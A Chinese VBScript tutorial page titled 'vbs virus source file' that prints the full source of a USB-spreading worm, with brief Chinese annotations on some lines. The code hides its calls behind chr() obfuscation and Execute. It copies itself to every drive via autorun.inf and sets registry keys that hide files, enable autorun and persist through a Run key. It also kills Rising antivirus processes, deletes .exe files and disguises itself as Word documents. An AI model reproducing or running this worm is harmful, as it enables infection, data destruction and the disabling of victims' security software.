vbs病毒源文件_vbs教程-查字典教程网
vbs病毒源文件
vbs病毒源文件
发布时间:2016-12-28 来源:查字典编辑
摘要:remvbs.rhlDimfs,r,ss,w,reg,regpath,dvbsddd="Setfs="&chr(67)&"reate"&"O...

remvbs.rhl

Dimfs,r,ss,w,reg,regpath,dvbs

ddd="Setfs="&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&"Scrip"&chr(116)&"ing.File"&chr(83)&"yste"&chr(109)&chr(79)&"bject"&chr(34)&chr(41)

Executeddd

rrr="setr="&chr(119)&"scri"&"pt."&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&chr(119)&"scri"&"pt."&chr(115)&"he"&chr(108)&chr(108)&chr(34)&chr(41)

Executerrr

sss="fs."&chr(103)&"etfil"&chr(101)&chr(40)&chr(119)&"scri"&"pt."&"scri"&chr(112)&"tfull"&chr(110)&"ame"&chr(41)

ttt="setdvbs="&sss

Executettt

r.run(fs.GetSpecialFolder(0)&"explorer.exe.")

main()

OnErrorResumeNext

submain()

regtime()

finddrive()

countdrive(ss)

regwrite()

ganranfile(ss)

xunhuan()

endsub

Functionfinddrive()

ifdvbs.name="USBDRIVE.dll"then

regwrite()

ganrandisk()

endif

ifdvbs.name<>"autorun.vbs"anddvbs.name<>"USBDRIVE.dll"then

regwrite()

dvbs.delete(true)

endif

ss=Trim("")

Setdc=fs.Drives

ForEachdIndc

Ifd.DriveType=1ord.DriveType=2andd.IsReadyThen

ss=ss&d.DriveLetter

endif

Next

ss=StrReverse(LCase(Trim(ss)))

endFunction

Functioncountdrive(ss)

OnErrorResumeNext

dimx

Fori=1ToLen(ss)

x=Mid(ss,i,1)

ifx=""then

x=Mid(ss,1,1)

i=1

endif

Setw=fs.GetDrive(x)

ganrandiskroot()

Next

endFunction

Functionganrandiskroot()

dimc,s,f,vbc,ts,runreg

OnErrorResumeNext

Ifw.DriveType=2orw.DriveType=1andw.IsReadyThen

Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

fff=sss&".copy("&chr(34)&fs.GetSpecialFolder(1)&"USBDRIVE.dll"&chr(34)&")"

Executefff

Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

fff=sss&".copy("&chr(34)&"D:SystemVolumeInformationUSBDRIVE.dll"&chr(34)&")"

Executefff

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endif

endif

Iffs.FileExists(w.DriveLetter&":autorun.vbs")Then

Setc=fs.opentextfile(w.DriveLetter&":autorun.vbs",1)

vbc=c.readall

IfInStr(vbc,"vbs.rhl")<>0Then

c.Close

Else

c.Close

Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")

c.delete(true)

fff=sss&".copy("&chr(34)&w.DriveLetter&":autorun.vbs"&chr(34)&")"

Executefff

s=Array("2007总结病毒","这是病毒","违纪病毒","检查病毒","黑名单病毒","没有发出的病毒","恋爱的病毒(病毒)")

Randomize

i=Int((6*Rnd)+1)

fff=sss&".copy("&chr(34)&w.DriveLetter&":"&s(i)&".vbs"&chr(34)&")"

Executefff

Setb=fs.GetFile(w.DriveLetter&":"&s(i)&".vbs")

b.attributes=b.attributes-b.attributes

Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")

c.attributes=c.attributes+7

Iffs.FileExists(w.DriveLetter&":vbs.reg")orfs.FileExists(w.DriveLetter&":doc.reg")Then

else

ifw.DriveLetter="C"then

Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"doc.reg")

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"doc.reg")

f.attributes=f.attributes+7

else

Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endif

endif

else

fff=sss&".copy("&chr(34)&w.DriveLetter&":autorun.vbs"&chr(34)&")"

Executefff

s=Array("检查病毒","2007总结病毒","违纪病毒","这是病毒","黑名单","没有发出的病毒","恋爱的病毒(病毒)")

Randomize

i=Int((6*Rnd)+1)

fff=sss&".copy("&chr(34)&w.DriveLetter&":"&s(i)&".vbs"&chr(34)&")"

Executefff

Setb=fs.GetFile(w.DriveLetter&":"&s(i)&".vbs")

b.attributes=b.attributes-b.attributes

Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")

c.attributes=c.attributes+7

Iffs.FileExists(w.DriveLetter&":vbs.reg")orfs.FileExists(w.DriveLetter&":doc.reg")Then

else

ifw.DriveLetter="C"then

Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"doc.reg")

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(fs.GetSpecialFolder(1)&"doc.reg")

f.attributes=f.attributes+7

else

Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":vbs.reg")

f.attributes=f.attributes+7

Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(w.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endif

endif

Iffs.FileExists(w.DriveLetter&":autorun.inf")Then

Setc=fs.opentextfile(w.DriveLetter&":autorun.inf",1)

vbc=c.readall

IfInStr(vbc,"WScript.exe.autorun.vbs")<>0Then

c.Close

Else

Setf=fs.GetFile(w.DriveLetter&":autorun.inf")

f.attributes=f.attributes-f.attributes

Setts=f.OpenAsTextStream(2,-2)

ts.WriteLine"[AutoRun]"

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

f.attributes=f.attributes+7

endif

else

Setts=fs.CreateTextFile(w.DriveLetter&":autorun.inf",true)

ts.WriteLine"[AutoRun]"

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

Setf=fs.GetFile(w.DriveLetter&":autorun.inf")

f.attributes=f.attributes+7

EndIf

endif

endFunction

Functionregwrite()

OnErrorResumeNext

dims

a1="HKE"&"Y_CUR"&"RENT_US"&"ERSoft"&"wareMi"&"croso"&"ftWin"&"dowsCur"&"rentV"&"ersionExp"&"lorerAd"&"vanced"(a1=HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced

a2="HK"&"EY_CLAS"&"SES_RO"&"OTDLL"&"File"(a2=HKEY_CLASSES_ROOTDLLFile)

a3="HKEY"&"_LOCA"&"L_MACH"&"INESOFT"&"WAREMi"&"cros"&"oftWin"&"dowsCur"&"rentVer"&"sionpoli"&"ciesExpl"&"orerNoDr"&"iveTypeAutoRun"

(a3=HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerNoDriveTypeAutoRun)

a4="HKE"&"Y_CURR"&"ENT_USE"&"RSoftw"&"areMicr"&"osoftWi"&"ndowsCur"&"rentVersi"&"onPolici"&"esExplor"&"erNoDriveT"&"ypeAutoRun"

(a4=HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun)

a5="HK"&"EY_LO"&"CAL_MA"&"CHINESof"&"twareMi"&"croso"&"ftWind"&"owsCurre"&"ntVersi"&"onRu"&"nUSBDR"&"IVE.dll"

(a5=HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunUSBDRIVE.dll)

a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)e)

a7="HKE"&"Y_CLAS"&"SES_ROO"&"TVBSF"&"ileDefau"&"ltIcon"

(a7=HKEY_CLASSES_ROOTVBSFileDefaultIcon)

sets=fs.GetDrive(fs.GetDriveName(dvbs.path))

scandoc(fs.GetSpecialFolder(0)&"Installer")

ifreg="wordicon.exe"then

ifs="C:"then

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationdoc.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"doc.reg")

endif

else

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationdoc.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&s.DriveLetter&":doc.reg")

endif

endif

ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)®path&",1"&chr(34)

Executeppp

else

ifs="C:"then

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationvbs.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"vbs.reg")

endif

else

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationvbs.reg")

else

r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&s.DriveLetter&":vbs.reg")

endif

endif

ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"shell32.dll,1"&chr(34)

Executeppp

endif

ppp=a6&Space(2)&chr(34)&a1&"ShowSuperHidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a1&"HideFileExt"&chr(34)&","&"1,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a1&"Hidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a2&"ScriptEngine"&chr(34)&","&chr(34)&"VBScript"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a2&"ScriptHostEncode"&chr(34)&","&chr(34)&"{85131631-480C-11D2-B1F9-00C04F86C324}"&chr(34)

Executeppp

ppp=a6&Space(1)&chr(34)&a2&"ShellOpenCommand"&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"Wscript.exe"&Space(1)&chr(34)&chr(34)&"%1"&chr(34)&chr(34)&Space(1)&"%*"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a2&"ShellExPropertySheetHandlersWSHProps"&chr(34)&","&chr(34)&"{60254CA5-953B-11CF-8C96-00AA00B8708C}"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a3&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

ppp=a6&Space(2)&chr(34)&a4&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp

iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then

ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&"D:SystemVolumeInformation"&"USBDR"&"IVE.dll"&chr(34)

Executeppp

else

ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"USBDR"&"IVE.dll"&chr(34)

Executeppp

endif

ifday(date())="27"then(27号报告错误)

msgbox"小样!你的杀毐软件该升级了,磁盘已被格式化"

EndIf

endFunction

Functionscandoc(a)(定义子函数)

OnErrorResumeNext(出错不报告)

dimfiles,file,subfolder,folder_

setfolder_=fs.getfolder(a)

setfiles=folder_.files

foreachfileinfiles(foreach。。。next对数组或集合中的每个元素重复执行一组语句)

iffile.name="wordicon.exe"then

reg=file.name

regpath=file.path

exitFunction

endif

next(foreach的next)

setsubfolders=folder_.subfolders(set是一个赋值语句)

foreachsubfolderinsubfolders

scandoc(subfolder)

next

endFunction(结束子程序的定义)

Functionregtime()(定义一个子程序添加注册表,结束瑞星)

a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)echr(116)是值)

a8="HKE"&"Y_CUR"&"RENT_US"&"ERSoft"&"wareMicr"&"osoftWin"&"dowsScr"&"iptingHo"&"stSettin"&"gsTimeou(a8=注册表HKEY_CURRENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout)

ppp=a6&Space(2)&chr(34)&a8&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)

Executeppp(对指定的字符串执行正则表达式搜索)

dimNameorPID

kill=Array("RavMon.exe","RavTask.exe","RavStub.exe","RavMond.exe","RsAgent.exe")

fori=0to4

KillProcess(kill(i))(结束4个瑞星程序)

next

endFunction(结束这个子程序)

Functionganranfile(aa)(定义一个子程序)

OnErrorResumeNext(出错不报告)

dimx

Fori=1ToLen(aa)(len函数返回字符串内字符的数目,或是存储一变量所需的字节数)

x=Mid(aa,i,1)(mid函数从字符串中返回指定数目的字符。这里是一个个返回给X)

ifx=""then

x=Mid(aa,1,1)

i=1

endif

Setx=fs.GetDrive(x)

ifx.IsReadythen

scan(x)

else

xunhuan()

endif

Next

endFunction(结束本子程序,作用不明)

Functionscan(x)(定义子程序scan(a))

OnErrorResumeNext(出错不报告)

dimfiles,file,subfolder,folder_

setfolder_=fs.getfolder(x)

setfiles=folder_.files

foreachfileinfiles

s=file.path

ext=fs.GetExtensionName(file)

ext=lcase(ext)(lcase函数返回字符串的小写形式)

ifext="doc"then

fff=sss&".copy("&chr(34)&mid(s,1,len(s)-3)&"vbs"&chr(34)&")"(fff是sss.copy加几个字符

怀疑这个几个字符组成一个文件名)

Executefff

endif

next

setsubfolders=folder_.subfolders

foreachsubfolderinsubfolders

scan(subfolder)

next

endFunction

Functionganrandisk()

OnErrorResumeNext

regwrite()

dimdoc,d,s,coun,w,h,oo

Setdoc=fs.Drives

foreachkindoc

ifk.IsReadythen

h=h&k.DriveLetter

endif

next

t1=len(Trim(h))

coun=doc.count

dowhilecoun>0

oo=h&w

clearinfo(oo)

wscript.sleep50

Setd=fs.Drives

ifd.count>counthen

foreachkind

ifk.IsReadythen

s=s&k.DriveLetter

endif

next

coun=d.count

t=StrReverse(LCase(Trim(s)))

w=mid(t,1,abs(len(t)-t1))

countdrive(w)

ganranfile(w)

s=trim("")

t1=len(t)

endif

ifd.count<counthen

foreachkind

ifk.IsReadythen

s=s&k.DriveLetter

endif

next

coun=d.count

t=StrReverse(LCase(Trim(s)))

s=trim("")

t1=len(t)

endif

loop

endFunction

Functionxunhuan()

OnErrorResumeNext

dimsfo

setsfo=fs.GetDrive(fs.GetDriveName(dvbs.path))

ifdvbs.name="autorun.vbs"ordvbs.name="USBDRIVE.dll"then

ifsfo.DriveType=2then

ganrandisk()

else

wscript.quit

endif

else

dvbs.delete(true)

endif

endFunction

Functionclearinfo(oo)

OnErrorResumeNext

dimdc,z

oo=LCase(Trim(oo))

Form=1ToLen(oo)

z=Mid(oo,m,1)

Setz=fs.GetDrive(z)

findinf(z)

v=Array(z.DriveLetter&":recycled",z.DriveLetter&":SystemVolumeInformation")

fori=0to1

scanexe(v(i))

next

next

vir=array(fs.GetSpecialFolder(1)&"recycled",fs.GetSpecialFolder(2),fs.GetSpecialFolder(0)&"system")

fori=0to2

scanexe(vir(i))

next

endFunction

Functionscanexe(a)

wscript.sleep100

OnErrorResumeNext

dimfiles,file,folder_

iffs.FolderExists(a)then

setfolder_=fs.getfolder(a)

setfiles=folder_.files

foreachfileinfiles

ext=fs.GetExtensionName(file)

ext=lcase(ext)

ifext="exe"then

Setf=fs.GetFile(file)

f.delete(true)

endif

next

setsubfolders=folder_.subfolders

foreachsubfolderinsubfolders

scanexe(subfolder)

next

endif

endFunction

Functionfindinf(z)

OnErrorResumeNext

Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

fff=sss&".copy("&chr(34)&fs.GetSpecialFolder(1)&"USBDRIVE.dll"&chr(34)&")"

Executefff

Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then

else

ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&"D:SystemVolumeInformation"&"USBDR"&"IVE.dll"&chr(34)

Executeppp

endif

endif

Iffs.FileExists(z.DriveLetter&":autorun.vbs")Then

else

fff=sss&".copy("&chr(34)&z.DriveLetter&":autorun.vbs"&chr(34)&")"

Executefff

Setf=fs.GetFile(z.DriveLetter&":autorun.vbs")

f.attributes=f.attributes+7

endif

Iffs.FileExists(z.DriveLetter&":autorun.inf")Then

Setc=fs.opentextfile(z.DriveLetter&":autorun.inf",1)

vbc=c.readall

IfInStr(vbc,"WScript.exe.autorun.vbs")<>0Then

c.Close

Else

Setf=fs.GetFile(z.DriveLetter&":autorun.inf")

f.attributes=f.attributes-f.attributes

Setts=f.OpenAsTextStream(2,-2)

ts.WriteLine"[AutoRun]"(以下建立自动播放文件)

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

f.attributes=f.attributes+7

endif

else

Setts=fs.CreateTextFile(z.DriveLetter&":autorun.inf",true)

ts.WriteLine"[AutoRun]"

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

Setf=fs.GetFile(z.DriveLetter&":autorun.inf")

f.attributes=f.attributes+7

EndIf

iffs.FileExists(z.DriveLetter&":vbs.reg")then

else

Setts=fs.CreateTextFile(z.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(z.DriveLetter&":vbs.reg")

f.attributes=f.attributes+7

endif

iffs.FileExists(z.DriveLetter&":doc.reg")then

else

Setts=fs.CreateTextFile(z.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(z.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endFunction

FunctionKillProcess(NameorPID)

OnErrorResumeNext

DimoWMI,oProcs,oProc,strSQL

KillProcess=False

strSQL="SELECT*FROMWin32_Process"

IfNameOrPID<>""Then

IfIsNumeric(NameOrPID)Then

strSQL=strSQL&"WHEREHandle='"&NameorPID&"'"

Else

strSQL=strSQL&"WHEREName='"&NameorPID&"'"

EndIf

EndIf

SetoWMI=GetObject("winmgmts:.rootcimv2")

SetoProcs=oWMI.ExecQuery(strSQL)

ForEachoProcInoProcs

IfIsNumeric(NameOrPID)Then

oProc.Terminate

KillProcess=True

Else

oProc.Terminate

ifday(date())="27"then

setkillfile=fs.getfile(oProc.ExecutablePath)

killfile.delete(true)

EndIf

endif

Next

SetoProc=Nothing

SetoProcs=Nothing

SetoWMI=Nothing

EndFunction

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
    •
    最新vbs学习
    热门vbs学习
    脚本专栏子分类